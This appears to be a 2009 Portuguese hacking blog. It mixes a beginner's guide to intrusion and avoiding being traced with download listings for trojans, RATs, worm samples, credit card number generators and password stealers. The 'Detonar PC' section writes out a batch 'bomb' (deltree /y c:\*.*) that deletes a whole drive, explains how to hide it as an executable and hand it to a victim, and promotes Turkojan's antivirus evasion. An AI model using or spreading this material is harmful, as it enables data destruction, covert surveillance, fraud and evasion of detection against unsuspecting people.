É importante entender como o cérebro humano funciona em outras pessoas. Para se ter uma ideia de como comprometer a segurança de computadores, você deve "penetrar" na mente do administrador do sistema e pensar como você protegeria o sistema se fosse o encarregado. Você deve também levar em consideração que a muitas das pessoas são estúpidas, e isto será decisivo se você estiver tentando descobrir algumas senhas. Use o senso comum.
Nunca Pare de Aprender
Não pare aqui! Depois de entender sobre redes e UNIX, continue aprendendo mais. O que sobrou ? VAX/VMS, que é outro sistema operacional encontrado em alguns computadores conectados na Internet. Você pode começar explorando o mundo da criptografia (o que é suicídio se você odeia matemática). Mantenha-se atualizado nos novos desenvolvimentos em tecnologia. Simplificando: aprenda tudo o que puder todo dia.Eis algumas abilidades de Kevin Mitnick (talvez o mais famoso hacker de todos os tempos): VM/CMS, OS/VS1, DOS/VSE, MS-DOS, RST/E, VAX/VMS, UNIX, TOP-20,... Familiarizado com algum destes ? Isto só nos faz pensar em uma coisa, vamos estudar!!!
Fazendo a Conexão
Constantemente, escuta-se uma pergunta MUITO comum dos iniciantes: "Como eu me conecto a um sistema ?" ou "Como eu uso o Telnet ?" Para explicar algumas questões básicas: Você pode se conectar com qualquer máquina ligada na Internet com um programa de Telnet. Muitos programas utilizam o serviço de telnet quando você conecta-se a uma máquina. Por exemplo, se eu rodar meu programa e conectar com o xyz.com, ele irá me conectar com a porta 23, a porta da Telnet do xyz.com. Telnet, simplesmente, é um meio de se usar um terminal UNIX, como se você estivesse sentado em frente a um. Imagine estar discando em uma máquina em ambiente DOS e recebendo o prompt C:\>. É essencialmente a mesma coisa. Quando você aprender sobre UNIX, você verá que existem outros serviços (também conhecido como dameons), e poderá usar um programa de Telnet para conectar-se a vários deles. Onde encontrar tais programas ? Que tal em www.tucows.com, eles possuem vários deles.
Se você puder instalar uma variação do UNIX como o LINUX em seu computador, eu certamente sugiro-lhe que o faça. Este é o melhor caminho para aprender o sistema operacional. Além disso, o LINUX possui excelentes utilitários que o acompanham, como o GNU C compiler.
Também é importante identificar um erro comum que os iniciantes cometem quando aprendem por arquivos de texto. Não confundam TELENET com TELNET. TELENET é uma grande rede de servidores, agora também conhecido como SprintNet. Possui um sistema operacional especial e é acessado por números de acesso discado com um programa de terminal. Uma vez conectado você pode acessar diferentes servidores pelo seu NUA (Network User Address). Hacke(ar) em redes como SprintNet/Telenet é uma prática arriscada, por ser fácilmente rastreada. Você está discado diretamente na rede de sua linha telefônica. Novamente, um servidor pode simplesmente gravar o seu endereço IP se você conectar-se na Internet e usar a identificação de cliente para possivelmente conseguir o seu username do seu provedor.
Como Não Ser Pego
O erro que provavelmente todo hacker comete é que ele ou ela torna-se muito convencido ou popular. Não saia gritando que é um hacker na escola. Confie em menos pessoas posíveis. Quanto menos pessoas souberem que você está nisso, melhor. Não faça coisas idiotas, como hacke(ar) da sua própria casa a algum sistema de alta segurança. Embora este método está agora, "fora de moda", desde que existem meios mais fáceis de esconder sua identidade quando hack(eando) pela Internet. Existem vários meios para dificultar o rastreamento quando hack(eando) sistemas da Internet. Um deles, é conectar-se em diversos servidores com Telnet antes de acertar o seu alvo. Isto tornará o rastreamento muito mais difícil. Tente conectar-se a sistemas localizados em outros países. Nunca tente hack(ear) uma instituição governamental, você irá ser pego e irá para a cadeia! Não seja estúpido achando ser bom demais para ser pego. Nunca fale sobre hack(ear) ao telefone principalmente nos sem fio, você nunca sabe quem está ouvindo. Encripte suas mensagens de e-mail. Seja um pouco paranoico! Quanto mais paranoico você for, menos chance você terá de ser pego.
Último, Mas Muito Importante
Sempre digo que conhecimento é apenas metade do que faz um hacker. A outra metade é a ética. Você pode ser um perfeito gênio, mas se não tiver ética, você está no mesmo nível de um criminoso. Todo hacker possui um código de ética.
Você Não é um Hacker se
Você pirateia software
Você espalha viroses (qualquer um com um pouco de conhecimento de Assembler pode criar um vírus)
Você deleta arquivos alheios e destroi seus sistemas (qualquer um pode deletar um arquivo)
Você rastreia empresas de cartão de crédito ou bancos para conseguir dinheiro. Boa sorte e comece a estudar!

sábado, 28 de março de 2009

Hackers por Telnet


TELNET (protocolo de terminal virtual) é o protocolo internet para estabelecer a conexão entre computadores. Através dessa conexão remota, pode-se executar programas e comandos em outra maquína. como se o teclado de seu computador estivesse ligado diretamente a ela. O visual de uma conexão via telnet é semelhante ao que se tem em BBBs de interface DOS, e as operações do computador remoto se dá mesma forma, ou seja, através de uma linha de comandos Unix ou a partir de um menu de comandos disponiveis que sempre se apresenta em algum lugar da tela (está útima forma é a mais comum em servidores que permitem acesso publico). O telnel pode ser usado para a pesquisa de informações e transferência de arquivos - tudo depende do que o computador ao qual você está conectado permitir que você faça. Ele tambem é muito usado por operadores de sistemas (Sysop) a fim de fazer qulgum tipo de manuntenção (se você pensa que o sysop de seu provedor sai de casa toda vez que tem alguma problema nos servidores, está muito enganado: muitas vezes ele faz manuntenção de casa mesmo, via telnet)Conectando-se via telnetOs passos que apresentamos aqui são para o programa que aconpanha o windows 95, mas servem perfeitamente para outros programas, com algumas variedades, que você pode perceber e contonar. Se você tem alguma dos programas listados ao lado, leia isto primeiro e depois passe para a pagina especifica desse programa. Inicie o programa telnet.exe ou outro ultilitario para esse fom.Cloque no menu (conectar), selecione"Sistema Remoto" o endereço ao qual você que se conectar(ex.:spacelink.msfc.nasa.gov).Nas caixas"Porta" (port) e tipo de terminal (terminal type selecione "telnet" e "vt100", respectivamente (isso não é um padão, mas é usual; pode ser que em alguns lugares você tenha que mudar essa configuração). Feito isso, clique no botão "conectar"(connect).Isto inicia a conexão com o computador remoto. Frequentemente, ao se completar a conexão, o sistema remoto pede uma senha.No nosso exemplo, digite "quest" e aperte enter(lembre-se, você operando um sistema de interface parecida com oDOS - naverdade =e UNIX - esqueça o mouse e use o Teclado).Isto abrirá as portas do computador remoto para você. Na tela surge uma série de opções, preceditas de um número ou letra. Para executar um desses commandos, digite esse número ou letra e aperte enter (os usuarios da época pré-windows não terão a menór dificuldade Nisso.) Explore o sistema ao qual você se conectou para exercitar.Quando quiser terminar a conexão, volte ao menu "conectar" e selecione "Desconectar".Abaixo temos alguns endereços onde você pode fazer uma conexão via telnet. netfind.if.usp.br Busca mundial de usuarios na internet. Digite netfind ao estabelecer a conexão. ned.ipa.caltech.edu Banco de dados Extragalatico da NASA/IPAC. Digite ned na conexão. spacelink.msfc.nasa.gov Banco de dados da NASA Digite guest ao se conectar. stis.nsf.gov informações cientificas e tecnológicas. Digite public na conexão. aleph.pucrs.br(*) PUC - Pontifica Universidade Católica. Porto Alegre, RS. Acesso a banco de dados Bobliograficos.(*) username "guest". asterix.ufrgs.br(*) UFRGS - Univercidade Federal do Rio Grande do Sul. Porto Alégre, RS, Acesso a banci de dados bibliograficos.(*)username "sabibib", password "bib1993". bee08.uspnet.usp.br(*) USP/CCE - Univercidade de São paulo. Centro de Computação eletronica. São Paulo, SP.Acesso a banco de dados bibliograficos.(*) username"dedalus". brmc.bireme.br(*)BIREME - Bibliotéca de Resenha Medica.São Paulo, SP.Acesso a banco de dados na área de saude.(*) username "bireme". (É necessario cadastrar-se, envie mensagem para online@bireme.br").

segunda-feira, 23 de março de 2009

Devil invasão

Devil 1.3 Programa de invasão

Doly 1.2 Programa de invasão

Evil Ftp Servidor de FTP

Troja,Worms,Boot - BAIXAR

Boot viruses
NYB.zip
Parity.b.zip
WYX.b.zip
Stoned.a.zip
PingPong.a.zip
Form.a.zip
Parity.a.zip
Bye.zip
DOS file viruses
Junkie.1027.zip
HLLC.Crawen.8306.zip
Macro viruses
Macro.Word97.Thus.aa.zip
Macro.Word97.Melissa.m.zip
Macro.Word97.Ethan.zip
Macro.Word.Cap.zip
Macro.Word97.Marker-based.zip
Macro.Word97.Marker.r.zip
Macro.Office.Triplicate.c.zip
Trojan programs
Trojan.Win32.VirtualRoot.zip
JS.Fortnight.b.zip
Trojan.PSW.Hooker.24.h.zip
Trojan.JS.Seeker.o.zip
JS.Trojan.Seeker-based.zip
Trojan.Win32.DesktopPuzzle.zip
JS.Trojan.Seeker.b.zip
Backdoors
Backdoor.SdBot.aa.zip
Backdoor.Zenmaster.102.zip
Backdoor.DonaldDick.152.zip
Backdoor.DonaldDick.15.zip
Backdoor.Buttman.zip
Windows 9x viruses
Worm.Win32.Fasong.a.zip
Worm.Win32.Lovesan.a.zip
Win32.Xorala.zip
Win32.FunLove.4070.zip
Worm.Win32.Muma.c.zip
Win95.Dupator.1503.zip
Win32.HLLP.Hantaner.zip
Joke.Win32.Errore.zip
Joke.Win32.Zappa.zip
Internet viruses
Worm.Bagle.Z.tar
IIS-Worm.CodeRed.a.zip
I-Worm.Moodown.b.zip
I-Worm.NetSky.d.zip
I-Worm.Rays.zip
I-Worm.Sober.c.dat.zip
I-Worm.LovGate.i.zip
IIS-Worm.CodeRed.c.zip
I-Worm.Sober.c.zip
I-Worm.Mydoom.a.zip
I-Worm.Mimail.a.zip
I-Worm.Tanatos.dam.zip
I-Worm.Swen.zip
Worm.P2P.SdDrop.c.zip
I-Worm.Sobig.f.zip
I-Worm.Klez.e.zip
I-Worm.Sobig.b.zip
I-Worm.Tanatos.b.zip
I-Worm.Fizzer.zip
Worm.Win32.Opasoft.a.pac.zip
I-Worm.Tettona.zip More Internet viruses...
ClamAV
Worm.Bagle.AG.scr
Exploit.HTML.IFrame.html
Trojan.ZipDoubleExt-1.zip
Worm.Mytob.IV.zip
Worm.Mytob.BM-2.zip
Worm.SomeFool.Q.zip
Trojan.W32.PWS.Prostor.A.zip
Worm.Mydoom.AS.zip
Worm.Mytob.V.zip
Worm.Bagle.AG.com
Worm.Mytob.S.zip
HTML.Phishing.Pay-40.html
Trojan.ZipDoubleExt-3.zip
Worm.Mytob.A.zip
Worm.Mytob.GH.zip
Worm.Mytob.BD.zip
Worm.Mytob.S.pif
HTML.Phishing.Auction-64.html
Worm.Mytob.IL.exe
Worm.Mytob.DD.zip
HTML.Phishing.Pay-51.html More ClamAV...

Detonar PC

Bom este método aqui é simples vc só tem que passar o arquivo para a vitima seu amiquinho..... Seguinte, para criar um arquivo bomba, vc deve editar o "código" dele use o bloco de notas.... Abra o bloco de notas. Vamos criar um arquivo BAT, não estamos fazendo nenhum vírus, isto é apenas uma sequência de comandos DOS juntos, na verdade escondidos, tipow, vc não vai chegar pra alguém e pedir pra ele digitar no DOS: deltree /y c:\*.* , porque ninguém em juízo normal ia fazer isso.... nesse arquivo vc vai dizer o que acontecerá quando o arquivo for executado... Sendo assim, vc pode colocar mensagens antes e após a execução dos comandos. Ai estão alguns comandos ( estes são comandos de DOS ) que vc poderá colocar no seu arquivo bomba: deltree = deleta arquivos e diretórios rename = renomeia arquivos e diretórios cls = limpa a tela @echo off = faz com que os comandos abaixo dessa linha não sejam mostrados pause = pausa a execução do arquivo. ( faz aparecer uma linha ="Precione qualquer tecla para continuar..") @echo on = faz com que os comandos abaixo dessa linha sejam mostrados Um arquivo destes simples pode ser feito com o seguinte código: @echo off c:\ deltree /y c:\*.* O que estes comandos farão? @echo off: f'ará com que os comandos c:\ e deltree /y c:\*.* não sejam mostrados.... c:\ : chama o drive c: deltree /y c:\*.* deleta todos os arquivos e diretórios do HD. Se vc não colocar o /y após o comando deltree, aparecerá uma pergunta assim > "excluir.....?" Então não esqueça de colocar o /y após o deltree. Agora que vc já bateu o código, salve o arquivo com extensão .bat ( ex: "arquivo.bat" ) Cuidado para não executar o arquivo. Enquanto ele estiver com extensão bat, vc ainda poderá mudar os comandos dele, abrindo-o no bloco de notas e fazendo as alterações..... Estando o arquivo com extensão bat, qualquer um poderá ver o código, inclusive a vitima ( seu amiguinho ) portando, assim que vc acabar de criar o arquivo bomba.... transforme-o em executável. Para transdormar arquivo BAT em executável COM vc tem que arrumar o programa BAT2EXEC ! <<< Eu não me responsabilizo pelos seus atos !!!

Ferramentas Hacker

Haktek
Ferramenta Hacker com nuker's, e-mail bomb e mais
235K
Hacker's Utility(tm)
Ferramenta Hacker com nuker's, e-mail bomb e mais
427K
Fhack20
Ferramenta Hacker com nuker's, e-mail bomb e mais
78K
Callsoft
Identificador de Chamadas
55K
Revelation
Revela senhas do tipo *****
6K
Virusm
Cria Virus

Download Sites for Version 3.4.0

Download Sites for Version 3.4.0
Europe (Zip File 541kb) Australia (Zip File 541kb) Updated Help File (with thanks to Daniel Thibault)Resource Hacker Tutorial and Other Tips

Tutorial by Bhikkhu PesalaTutorial by Vishal Gupta.Other Resource Hacker tips by Vishal Gupta. Resource HackerTM translations:

Simplified Chinese: (Ver 3.4.0) Translation by: Darong Lv Traditional Chinese: (Ver 3.2.10) Translation by: Menghsi Wu Japanese: (Ver 3.4.0) Translation by: Yoshiroh Maruoka

Curso Hacker 1.0

Downloads: 4882
Tamanho: 1,5 MB
Atualizado: 12/02/2008
Licença: Gratuito para testar (Demo)
Sistema(s) operacional(is): Windows 2000/XP/2003/ME
Desenvolvedor: Tecknoware
Requerimentos: Básico.
Marcadores: Curso, Hacker, download, gratis, baixar, copiar, downloads, programas

domingo, 22 de março de 2009

Beast 2.07

Beast 2.07
http://rapidshare.com/files/36043581/Beast_v2.07_06-08-2004.zip.html

Anti Prorat 2.5

Download (602KB)
Last Updated: 2009-01-06
License: Freeware Free
OS: Windows Vista, 2003, XP, 2000, 98, Me, NT-->
Requirements: No special requirements
Publisher: AddaxSoft More Products
Homepage: http://www.AddaxSoft.com
Total Downloads From 2008-01-01: 12,276
Downloads of Last week:
95

Turkojan 4 Dowmload

-Turkojan 4 - Download (RapidShare)Características:Remote Desktop característica adicionada. Poderá visualizar tela do controle remoto-lo através do seu teclado e mouse. Agora você pode gravar vídeo de webcam remota. Streaming de áudio característica acrescentada. Agora você não precisa baixar as imagens de computador remoto, você pode visualizá-los em miniatura gerente. Você pode obter os logs do MSN com o MSN Sniffer. Você pode bloquear páginas web-nocivos em computador remoto. Você pode gerenciar computador remoto com comandos do MS-DOS. (Remote Shell) Adicionadas novas funções para servidor sigilo - Agora é mais difícil de apagar servidor - Servidor não podem ser exibidos no registro, pesquisando arquivos, msconfig, etc - Servidor não pode ser exibido em Ctrl + Alt + del menu [Vista/Xp/95/98/ME]. - Servidor impede restoring.It sistema elimina todas sistema restaurar pontos. Servidor tamanho é 60% menor agora. Conexão bug fixo Agora servidor não pode ser detect por qualquer software antivírus, mas penso que será dedected em breve. Algumas mudanças foram feitas no Cliente aparência. Agora avançado keylogger pode capturar changements prancheta. Você pode instalar qualquer arquivo no computador remoto via internet a partir de Remote Downloader. Agora você pode obter mais informações sobre o computador remoto. Você pode saber softwares instalados em computadores remotos. Ajuda modo added.

MSNCliner

Descrição: O aplicativo gratuíto MSNCleaner elimina malwares que se utilizam do MSN Messenger e Windows Live Messenger. O programa não requer instalação, apenas baixe e descompacte em uma pasta ou na área de trabalho. Depois de iniciar o programa você pode mudar o idioma para Português. Basta clicar em “Analisar” e depois “Remover” (se for o caso). Funciona melhor se rodado em modo de segurança.
Tamanho: 144 KbFormato: RarSenha: : [Easy-Share]

Livro Negro do Hacker

Sinopse: Idéias para invasão de sistemas, como um Hackercomeça suas atividades, dicas para você saber quemrealmente pode invadir o seu PC, como ter segurança nassuas senhas, explicações detalhadas sobre o IP como quemgera, quem distribui, como ter maior segurança…Autor: Professor Marco AurélioTamanho: 5.96MBBaixar Rapidshare / Baixar Easy-share

Hackers - Segredos e Confissões

» Descrição
Esta obra apresenta de uma forma bem ampla assuntos relacionados a sistemas de segurança da informação em geral. A maioria dos conteudos foram retirados de sites parar fins de estudo, não sendo alterado as informações,e suas respectivas originalidades, e nem mesmo seus autores. Todo conteudo desse E-book é somente para estudo próprio, não me responsabilizo pelo mal uso das informações aqui contidas. São Geral: O E-book trata-se assuntos técnicos relacionados a: Criptografia, Segurança da Informação,Invasão, Falhas em Sistemas, ví­rus, trojans, exploits, proteção em geral, informática em geral, antiví­rus, Firewall, Hacking e dentre muitos outros tópicos.
» Informações
Tamanho: 6,70 MB - Formato: Pdf - Idioma: Português
» Download
Easy Share / Rapidshare

Pacote de ebook Hackers 2007

Download baixar Pacote de ebook Hacker 2007
Descrição:* Hackerismo: 16 Arquivos em Doc* Livro - O Guia do Hacker Brasileiro - Marcos Flávio Araújo Assunção* Revista Hacker Brasil* Segurança na Internet* Universidade Hacker - 12 Arquivos PDF* Gerador de CPF e CNPJ Válidos* Guia do Hacker Brasileiro* Guia do Hacker Brasileiro Critica* Desativando Auxiliar NetBIOS TCP/IP* Anti Trojan com Manual* Como roubar senha de Hotmail* Linux Dicas & Truques* Apostila Básica De Linux (Pt Br)* Guia Prático para o Debian GNU Linux (pt BR)* Referência de comandos - Linux (pt_BR)Páginas: 11 arquivos (várias pastas com documentos)Tamanho: 12.1 MBHospedagem: Download Rapidshare

ProRat v 1.9

Download - Baixar] ProRat v 1.9 + Crack + Serial + Patch + Keygen

Descrição: ProRat é um backdoor da classe Rat, que possui muitas funções de espião. Seu nome é uma fusão da palavra inglesa professional, juntamente com a sigla rat (Remote administrator tool). Criado em Visual Basic, o programa possui mais de 15 versões.ProRat permite a crackers executarem muitas ações maliciosas nas máquinas de suas vítimas. Entre elas incluem:* Keystrokes(Keylogger)* Roubar senhas* Controle total sobre arquivos* Formatação de Drive* Controle de Impressora* abrir/fechar driver de CD* Esconder taskbar, desktop, e botão iniciar* Fazer screenshots* Visualizar informações do sistema* Visualizar webcam/escutar microfone* Download e rodar arquivos
Tamanho: 3,01MBIdioma: PortuguêsFormato: RARSenha: tahocupado.blogspot.comDownload: [Easy-Share]

Programas Hackers 2009

Hacker 2012 Final Sinta-se um hacker neste simulador, você terá que roubar dinheiro, descubre senhas sigilosas e muito mais. Aproveite...+ Simuladores Diversos
Win 98 / Win 2000 /XP/2003/ME
Freeware1,18 Mb
7804
Lanma - Lan House Manager 3.13 Agora na versão 3.6 e com site novo o Lanma torna o usa da Lan House mais agradável. Acesse o novo site e veja ! Firewall interno contra hackers;...+ Gerenciamento de Provedores, Cyber-cafés e Similares
Win 98 / Win 2000 /XP/2003/ME
Freeware11,12 mb
3333
Curso Hacker 1.0 Curso Hacker é um demostrativo em formato de vídeo (flash) que vai ensinar várias coisas legais. O objetivo deste curso é ensinar ao usuário, as...+ Cursos
Win 98 / Win 2000 /XP/2003/ME
Demo1.30 mb
3314
Kaspersky Anti-Hacker 1.9.37 Kaspersky Anti-Hacker permite combater os hackers procurando pelos seus rastros e seus programas que são instalados em nossos computadores, com o...+ Antivírus
Win 98 / Win 2000 /XP/2003/ME
Freeware26,50 mb
3030
Resource Hacker 3.4.0 Resource Hacker permite visualizar, modificar, extrair e inserir linhas de código em arquivos executáveis 32-bits. Ele vem com um descompilador...+ Ferramentas de Programação Variados
Win 98/ Win 2000/ XP/ 2003 / ME / VISTA
Shareware - UL1.03mb
2192
BitDefender Free v8 O programa bloqueia vírus, cavalos-de-tróia, worms da Internet e scripts maliciosos com facilidade e filtros avançados. Você pode definir qual...+ Antivírus
Win 98 / Win 2000 /XP/2003/ME
Freeware13,10 Mb
1895
ProtectX Hacker Defence Suite 4.16 Este software permite saber informações úteis sobre um possível hacker/invasor do seu computador, detectando IP e outras configurações e você pode...+ Controle de Acesso
Win 98 / Win 2000 /XP/2003/ME
Freeware2,46 mb
1892
Web Blocker 1.5.1 Web Block ajuda a controlar o acesso na internet, mostrando seus recursos de forma segura e correta pois, além de bloquear e controlar o acesso a...+ Controle de Acesso
Win 98 / Win 2000 /XP/2003/ME
Shareware - SI1.23mb
1863
AVG Internet Security 7.5.433a904 Complete sua segurança contra todas as ameaças da Internet, como vírus, trojans, spyware, adware, hackers e Spam. Completo, fácil de usar - instale...+ Proteção contra Spywares
Win 98 / Win 2000 /XP/2003/ME
Shareware 30 dias32,90 MB
1390
Norton Internet Security 2007 Proteja sua privacidade e seu PC. O programa protege contra vírus e hackers com versões completas de antivírus e firewall. Tem também um anti-spam...+ Antivírus
Win 98 / Win 2000 /XP/2003/ME
Shareware 15 dias33,40 mb

Novos Programas hackers

Revelation V2Programa para revelar senhas em ***** .Facil utilização serve para wind 98/00/xp.

Free Ip ScannerO Free IP Scanner é um escaneador de IPs que se caracteriza pela velocidade com que efetua a busca, localizando centenas de computadores em questão de segundos.Sua funcionalidade é simples: defina o intervalo de IPs que deseja verificar e clique em Start Scanning. Uma barra com oprogresso da busca é exibida na parte inferior da janela, a qual é concluída com a mensagem Scan Finish.

Real PlayerO RealPlayer é um excelente player de áudio e vídeo, com mais de 200 milhões de usuários no mundo e 4 milhões no Brasil. Com ele, é possível acessar mais de 2.700 rádios em todo mundo, assim como acessar canais com conteúdo específico para usuários no Brasil. Esse software é indispensável para todo navegador Internet. Você certamente já deve ter acessado algum site onde foi preciso ter o RealPlayer para assistir algum vídeo ou ouvir algum som.

FscanScaneador de redes programa hacker

Programas <-Hackers->

Programas Hackers:
Ambush Programa de invasão

A-Trojan 1.5 Programa de invasão em português

AolTrojan Programa de invasão
Asylum 0.1.2 Programa de invasão
Back Orifice O programa de invasão mais famoso da net
Back Orifice 1.3 Cliente do BO
Barok 1.0 Worm de Email
Barok 2.0 Worm de Email
Barok 2.1 Versão mais recente
Bo Fácil Outro cliente do BO
Bo2 Cliente do BO com mais opções
Bo2k usa Back Orifice 2000, Versão U.S.A e Canada
Bo2k inter Back Orifice 2000, Versão Internacional
Bo2k Back Orifice 2000, Versão Instalável
Back Construction 2.1 Cliente e servidor de FTP
Back Construction 2.5 Versão mais recente
BackDoor 2.01 Programa de invasão
Bla 2.0 Programa de invasão
Bla 4.0 Versão mais recente
Blade-Runner Programa de invasão
Blazer 5 Programa de invasão
Bugs Programa de invasão
Bus Conquerer Procura ips infectados pelo NetBus
Coma Programa de invasão
Deep-Bo Procura ips infectados pelo BO
Deep-Throat Programa de invasão
Deep-Throat V2 Programa de invasão
Deep-Throat V3 Programa de invasão
Deep-Throat V3.1 Versão mais recente
Deep-Throat Orgasm Programa que trava o DT
Delta Source Programa de invasão
Devil 1.3 Programa de invasão
Doly 1.2 Programa de invasão
Doly 1.6 Programa de invasão
Doly 1.7 Versão mais recente
DonaldDick 1.52 Programa de invasão
Der Spaher 2.0 Programa de invasão
Der Spaher 3.0 Versão mais recente
Evil Ftp Servidor de FTP
Excalibur Programa de invasão
Executor Programa de invasão
Executor 2 Versão mais recente
Ftp Server que abre a porta 21
Forced Entry Programa de invasão
Frenzy Programa de invasão
Girl-Friend Programa de invasão
Gate Crasher Programa de invasão
Hackers Paradise 2 Programa de invasão
Hack'a'Tack 1.10 Programa de invasão
Hack'a'Tack 1.20 Programa de invasão
Hack'a'Tack 2000 Versão mais recente
Icq Trojan Trojan simples, cliente baseado em DOS
Inverter Server do BO
Ini Killer 3.0 Programa de invasão
InCommand 1.5 Programa de invasão
InsaneNetwork 4 Tipo server
InsaneNetwork 5 Versão mais recente
Illusion Mailer Programa de invasão
Joiner 1.5 Programa de invasão
Logged Programa de invasão (Cliente)
Master’s Paradise Programa de invasão, só que é meio complexo
Maverick's Matrix v1.4 Programa de invasão
Millenium Programa de invasão
Millenium 2 Versão mais recente
Naebi Apenas o server
Naebi 214 Versão mais recente
NetAdministrator 1.0 Programa de invasão
NetBus 1.20 A versão mais antiga do NetBus
NetBus 1.53 Programa de invasão
NetBus 1.60 Programa de invasão
NetBus 1.70 Programa de invasão
NetBus 1.70port Versão em português
NetBus 2.0 Programa de invasão
NetBus 2.01 Versão mais recente
NetBuster Kill Programa que trava o NetBuster
NetMonitor 2.0 Cliente do NetSpy
NetSpy Programa de invasão
NetSnoop Scaneador de Ips infectados
NetSphere 1.27a Programa de invasão
NetSphere 1.28 Programa de invasão
Network Terrorist 1.31 Programa de invasão para NT
PCrasher Programa de invasão em português
Phineas Phucker Programa de invasão
Phase Zero Programa de invasão
PictureNb 2.0 Server para o NetBus 2.0
Portal of Doom Programa de invasão
Progenic Trojan v1 Programa de invasão
Prosiak 0.47 Programa de invasão
Prosiak 0.70b5 Versão mais recente
Robo HacK Programa de invasão
Ripper Programa de invasão
RatHead 2.01 Programa de invasão
Satanz Backdoor Programa de invasão
SchoolBus 1.60 Programa de invasão
SchoolBus 2.0 Versão mais recente
Schwindler 1.82 Programa de invasão em português
Snid X2 Programa de invasão
Sockets 23 Programa de invasão, apenas o cliente
5000 Server do sockets
Shockrave Server que abre a porta 1981
Skydance 2.20b Programa de invasão
Subseven Programa de invasão
SubSeven 1.1 Programa de invasão
SubSeven 1.3 Programa de invasão
SubSeven 1.6 Programa de invasão
SubSeven 1.9 Programa de invasão
SubSeven 2.0 Programa de invasão
SubSeven 2.1a Programa de invasão
SubSeven 2.1 Gold Programa de invasão
SubSeven 2.2 Beta Versão mais recente
SubSeven Server2 Server para o SubSeven 1.9
Sub7 Apocalypse Programa de invasão
ShadowPhyre Programa de invasão
SK Silencer Programa de invasão
Striker Programa de invasão
Teldet Programa p/ verificar se a vítima está infectada com os servers do: BO, NetBus e GF
The Invasor Programa de invasão
The Prayer 1.2 Programa de invasão em português
The Thing 1.5 Programa de invasão
The Thing 1.6 Versão mais recente
Trojan Cow Programa de invasão
Truva-Ati Programa de invasão
Vampire 1.0 Programa de invasão
Vampire 1.2 Versão mais recente
War Trojan Programa de invasão
Web Ex Programa de invasão
Web Ex 1.3 Programa de invasão
Web Ex 1.4 Versão mais recente
WinCrash Programa de invasão
WinCrash 2.0 Versão mais recente
WinShutdown Programa de invasão Back Orifice - Trojan Blade Runner - Trojan Bug's -Trojan Cartao de Cretido - Gera e possui um checador pra ver se seu numero esta correto Cartao de Cretido 2 - Muito bom gerador de número de CC. Cleaner - Limpa sua máquina de mais de 25 trojans Cow trojan - Trojan CPF - Gera numeros de CPF Dictmake - Gera Word List Glide - Desincripta arquivos .PWL ICQsenha - Busca a senha do ICQ ICQsniffer - Dá o ip do lammer pelo UIN Keylog95 - Registra todas as teclas digitadas no PC Melissa - Nuke Netbus - Trojan Netbuster - Proteção para Netbus Nuke - Nuke Portscan - Scaneia portas Pwtool - Usado para desincriptar arquivos PWL Revelation - Programa usada para revelar senhas ******* IPScan - Coloca o IP do lammah e scaneia Senna Spy - Você cria seu trojan Sonar - Scan, ele da a distância que o lammer está de vc Subseven - Um ótimo trojan existente Trojan Hunter - Procura IPs infectado pelo trojan que vc quiser, basta configurar. Ótimo Wincrash - Melhor Trojan que existe. Português